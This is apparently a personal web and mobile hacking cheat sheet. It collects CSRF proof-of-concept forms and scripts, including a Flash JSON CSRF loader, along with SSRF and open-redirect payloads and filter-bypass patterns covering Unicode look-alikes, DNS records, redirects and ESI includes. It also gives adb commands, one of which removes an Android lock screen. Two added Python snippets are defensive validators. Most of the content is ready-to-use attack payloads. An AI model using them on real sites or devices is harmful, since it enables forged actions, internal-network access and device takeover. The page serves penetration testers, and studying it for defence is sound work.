OnePage CheatSheet



Web Hacking


  • XSS
    • SVG
    • Power
    • ABCD
  • SQLi
    • getSystemInfo
  • CSRF
  • SSRF
  • Path Traversal

Mobile Hacking


  • Android
  • iOS
  • Other

Awesome Technique


  • Bypass Host Validate
  • jjj

Code for Functions


  • HTTP Request / Response
    • Ruby
    • Python
    • Golang
    • Java
    • C
    • Rust
    • Android:Kotlin
    • Android:Java
    • iOS:ObjC
    • iOS:Swift
  • JSON Parsing


Code Snippet


  • Ruby
  • GoLang
  • Javascript
  • HTML/CSS

This is a cheatsheet page that I created for my own reference. If you have a payload/code you want to add, tweet or message @hahwul.
Cheers!

If you have a good payload or piece of code you would like to see added, please share it with me on Twitter. Thank you :)


Web Hacking

XSS

SQLi

CSRF

GET CSRF

<img style="width:1px;height:1px;" src="csrf url">

POST CSRF

<form name="csrf_poc" action="csrf url" method="POST">
<input type="hidden" name="state" value="success">
<input type="submit" value="Replay!">
</form>
<script type="text/javascript">document.forms.csrf_poc.submit();</script>

PUT/DELETE CSRF

Same domain/Weak CORS

<script>
// jQuery preload (optional); the request is only issued once the library has loaded
(function(){
  var s = document.createElement('script');s.type = 'text/javascript';s.async = true;s.src = 'https://code.jquery.com/jquery-2.1.4.min.js';
  s.onload = sendRequest;
  (document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(s);
})();

function sendRequest() {
  $.ajax({
    url: "/api/add/0001",
    type: "put",
    data: {"security":"false"},
    // Referer, Connection and Accept-Encoding are forbidden header names: the browser drops them
    headers: {
        "Accept":"application/json, text/plain, */*",
        "User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0",
        "Referer":"321654",
        "Connection":"keep-alive",
        "Accept-Language":"en-US,en;q=0.5",
        "Accept-Encoding":"gzip, deflate"
    },
    success: function (data) {
        console.info(data);
    }
  });
}
</script>

Rails method override through the “_method” parameter (a POST form is handled as PUT/DELETE)

<form method="post" ...>
  <input type="hidden" name="_method" value="put" />
...

https://www.hahwul.com/2016/07/web-hacking-putdelete-csrfcross-site.html

JSON CSRF(HTML)

<form action="csrf url" method="POST" enctype="text/plain">
<input name='{"title":123,"content":"hello","board_code":1,"hwul":"' value='bypass"}'>
<input type="submit" value="Attack!">
</form>

=> 

POST /xss.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: text/plain
Content-Length: 65
Referer: http://127.0.0.1/jcsrf.html
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

{"title":123,"content":"hello","board_code":1,"hwul":"=bypass"}

https://www.hahwul.com/2017/05/web-hacking-parameter-padding-for.html

JSON CSRF(SWF)

http[s]://[yourhost-and-path]/test.swf?jsonData=[yourJSON]&php_url=http[s]://[yourhost-and-path]/test.php&endpoint=http[s]://[targethost-and-endpoint]

Action Script code

Loader

package
{
   import flash.display.Sprite;
   import flash.events.Event;
   import flash.external.ExternalInterface;
   import flash.net.URLLoader;
   import flash.net.URLRequest;
   import flash.net.URLRequestHeader;

   // Parameters (jsonData, endpoint, php_url, ct, reqmethod) arrive through the SWF query string / FlashVars
   public class source extends Sprite
   {
      public function source()
      {
         super();
         var params:Object = this.root.loaderInfo.parameters;
         var jsonData:String = params.jsonData;
         var endpoint:String = params.endpoint;
         // Optional relay script: when set, the request goes to it with the endpoint as a query parameter
         var phpUrl:String = params.php_url ? params.php_url : "";
         var target:String = phpUrl != "" ? phpUrl : endpoint;
         var contentType:String = params.ct ? params.ct : "application/json";
         var request:URLRequest;
         if(phpUrl != "")
         {
            request = new URLRequest(target + "?endpoint=" + endpoint);
         }
         else
         {
            request = new URLRequest(target);
         }
         request.requestHeaders.push(new URLRequestHeader("Content-Type", contentType));
         // GET carries no body; any other method sends the supplied JSON (default is POST)
         request.data = params.reqmethod == "GET" ? "" : jsonData;
         request.method = params.reqmethod ? params.reqmethod : "POST";
         var loader:URLLoader = new URLLoader();
         loader.addEventListener(Event.COMPLETE, eventHandler);
         try
         {
            loader.load(request);
         }
         catch(e:Error)
         {
            trace(e);
         }
      }

      // Hands the response body to the embedding page's JavaScript function "process"
      public function eventHandler(param1:Event) : void
      {
         ExternalInterface.call("process", param1.target.data);
      }
   }
}

https://www.hahwul.com/2018/08/attack-json-csrf-with-swfactionscript.html
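The GET, form, _method and text/plain JSON variants above all depend on a server that performs a state change without checking where the request came from or in what media type it arrived. As an added example, not code from the page, this Python check resolves the Rails-style _method override, insists on application/json for JSON endpoints and verifies the Origin/Referer; SITE_ORIGIN, the request-dict shape and the TEXT_PLAIN_JSON_POST sample are assumptions constructed for the demonstration.

```python
from urllib.parse import parse_qs, urlsplit

SITE_ORIGIN = "http://127.0.0.1"            # assumed origin of the protected app
OVERRIDABLE = {"put", "patch", "delete"}   # methods Rails accepts through _method


def effective_method(method, content_type, body):
    """Apply the Rails-style _method override so a POST form that carries
    _method=put is handled as the PUT it really is, not as a plain POST."""
    method = method.lower()
    media_type = content_type.split(";")[0].strip().lower()
    if method == "post" and media_type == "application/x-www-form-urlencoded":
        override = parse_qs(body).get("_method", [""])[0].lower()
        if override in OVERRIDABLE:
            return override
    return method


def is_csrf_safe(req, expects_json=False):
    """req = {'method', 'headers' (lower-case names), 'body'}. True when the app may
    act on it. A per-session token on forms is still required; this is defence in depth."""
    headers = req["headers"]
    ctype = headers.get("content-type", "")
    method = effective_method(req["method"], ctype, req.get("body", ""))
    if method in ("get", "head", "options"):
        return True   # only sound if GET never changes state (the <img src> case)
    # A JSON API must insist on its media type: <form enctype="text/plain"> can ship a
    # JSON-shaped body, but a cross-site page cannot set Content-Type: application/json
    # without a CORS preflight that the server is free to deny.
    if expects_json and ctype.split(";")[0].strip().lower() != "application/json":
        return False
    # Browsers attach Origin to cross-site POST/PUT/DELETE and scripts cannot forge it;
    # a Referer set from JavaScript is silently dropped as a forbidden header.
    source = headers.get("origin") or headers.get("referer")
    if not source:
        return False  # unknown provenance: refuse rather than guess
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" == SITE_ORIGIN


# Constructed request mirroring the text/plain JSON CSRF capture above.
TEXT_PLAIN_JSON_POST = {
    "method": "POST",
    "headers": {"content-type": "text/plain", "referer": "http://127.0.0.1/jcsrf.html"},
    "body": '{"title":123,"content":"hello","board_code":1,"hwul":"=bypass"}',
}
```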

SSRF

Basic attack

?url=http://localhost/server-status
?url=http://127.0.0.1/server-status
?url=http://internal_domain/page
?url=http://internal_ip(192.138.0.14)/page

Bypass SSRF with special characters

?url=http://allow_domain.internal_domain_or_ip/page
?url=http://allow_domain@internal_domain_or_ip/page
?url=http://internal_domain_or_ip#.allow_domain/page
?url=http://internal_domain_or_ip?.allow_domain/page
?url=http://internal_domain_or_ip\.allow_domain/page
?url=https://ⓦⓦⓦ.ⓗⓐⓗⓦⓤⓛ.ⓒⓞⓜ (normalizes to www.hahwul.com)

[ List ]
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ 
⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ 
⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ 
⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ 
Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ 
ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ 
⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿

Bypass SSRF Domain CNAME & A-Record

[ CNAME ]
http://localhost.hahwul.com/server-status

$ nslookup localhost.hahwul.com
localhost.hahwul.com    canonical name = localhost.
Name:    localhost
Address: 127.0.0.1


[ A-Record ]
http://127.hahwul.com/server-status

Bypass SSRF HTTP Redirect

?url=http://your-domain/r.php

[ r.php ]
<?php
header('Location: http://127.0.0.1:8080/server-status');
?>

SSRF with ESI (Edge Side Includes)

<esi:include src="http://127.0.0.1/server-status"/>
<esi:include src="http://internal_domain/server_base_csrf_page"/>

Open Redirect

Basic Attack

?url=https://www.hahwul.com

Open Redirect bypass pattern

?url=https://allow_domain.hahwul.com
?url=https://allow_domain@hahwul.com
?url=https://www.hahwul.com#allow_domain
?url=https://www.hahwul.com?allow_domain
?url=https://www.hahwul.com\allow_domain
?url=https://www.hahwul.com&allow_domain
?url=http:///////////www.hahwul.com
?url=http:\\www.hahwul.com
?url=http:\/\/www.hahwul.com
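The SSRF and Open Redirect bypass patterns above all exploit a validator that searches for the allowed domain as a substring instead of extracting the real host and checking where it resolves. As an added example (not the page's own code), this Python check parses the authority properly, refuses NFKC look-alike hosts, matches an exact allow-list and, for server-side fetches, resolves the host and rejects non-global addresses; is_safe_url, fold_host, the 1.2.3.4 address and the FAKE_DNS records are constructed for the demonstration.

```python
import ipaddress
import socket
import unicodedata
from urllib.parse import urlsplit

def fold_host(host):
    """NFKC-fold a host the way IDNA does: ⓦⓦⓦ.ⓗⓐⓗⓦⓤⓛ.ⓒⓞⓜ becomes www.hahwul.com."""
    return unicodedata.normalize("NFKC", host).lower()

def resolve_all(host):
    return {info[4][0] for info in socket.getaddrinfo(host, None)}  # follows CNAMEs

def is_safe_url(url, allowed_hosts=None, resolver=None):
    """allowed_hosts: exact hostnames permitted (None = any). resolver: host -> set of
    IPs; when given, every IP must be globally routable. The fetch that follows must
    still disable redirects and connect to the checked IP (DNS rebinding)."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    if parts.scheme not in ("http", "https"):
        return False
    # .hostname is cut from the authority alone (after userinfo, before port/'?'/'#'),
    # so allow@target, target#.allow and target?.allow expose the real host, while
    # http:\\host and http:///////host have an empty authority and are refused.
    host = parts.hostname
    if not host or not host.isascii() or fold_host(host) != host:
        return False                      # non-ASCII look-alikes are refused outright
    if allowed_hosts is not None and host not in allowed_hosts:   # exact, never endswith
        return False
    if resolver is None:
        return True
    try:  # CNAME -> localhost, 127.hahwul.com A records, 127.0.0.1, 192.168.x.x fail here
        addrs = resolver(host)
        return bool(addrs) and all(ipaddress.ip_address(a).is_global for a in addrs)
    except (OSError, KeyError, ValueError):
        return False

FAKE_DNS = {  # constructed records so the check runs offline; they mirror the tricks above
    "www.hahwul.com": {"1.2.3.4"},           # constructed public address
    "localhost.hahwul.com": {"127.0.0.1"},   # CNAME to localhost.
    "127.hahwul.com": {"127.0.0.1"},         # A record pointing at loopback
    "127.0.0.1": {"127.0.0.1"},
    "internal_domain_or_ip": {"192.168.0.14"},
}

def fake_resolver(host):
    return FAKE_DNS[host]
```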

Path Traversal

Mobile Hacking

Android

(adb) run custom scheme

adb shell am start -a android.intent.action.VIEW -d "testapp://run"

(adb) run activity

adb shell am start -a android.intent.action.MAIN -n com.test.app/.MainActivity

(adb) send broadcast

adb shell am broadcast -a android.accounts.LOGIN_ACCOUNTS_CHANGED

(adb) run service

adb shell am startservice -n com.test.app/.Service

(adb) install apk

adb install test.apk

(adb) reinstall apk

adb install -r test.apk

(adb) send key input (when typing on the on-screen keyboard is a hassle)

adb shell input text "this text send to mobile keyboard"

(adb) generate random events with monkey

adb shell monkey -p com.test.app -v 300

(adb) delete lock screen pattern

am start -n com.android.settings/com.android.settings.ChooseLockGeneric --ez confirm_credentials false --ei lockscreen.password_type 0 --activity-clear-task

(frida) bypass pinning

iOS

(command) run custom scheme

open -g /Applications/Safari.app testapp://blahblah; killall Safari

Awesome Technique

Bypass Host Validate

Code for Functions

Code Snippet

Center alignment

position:absolute;top:50%;left:50%;transform: translate(-50%,-50%)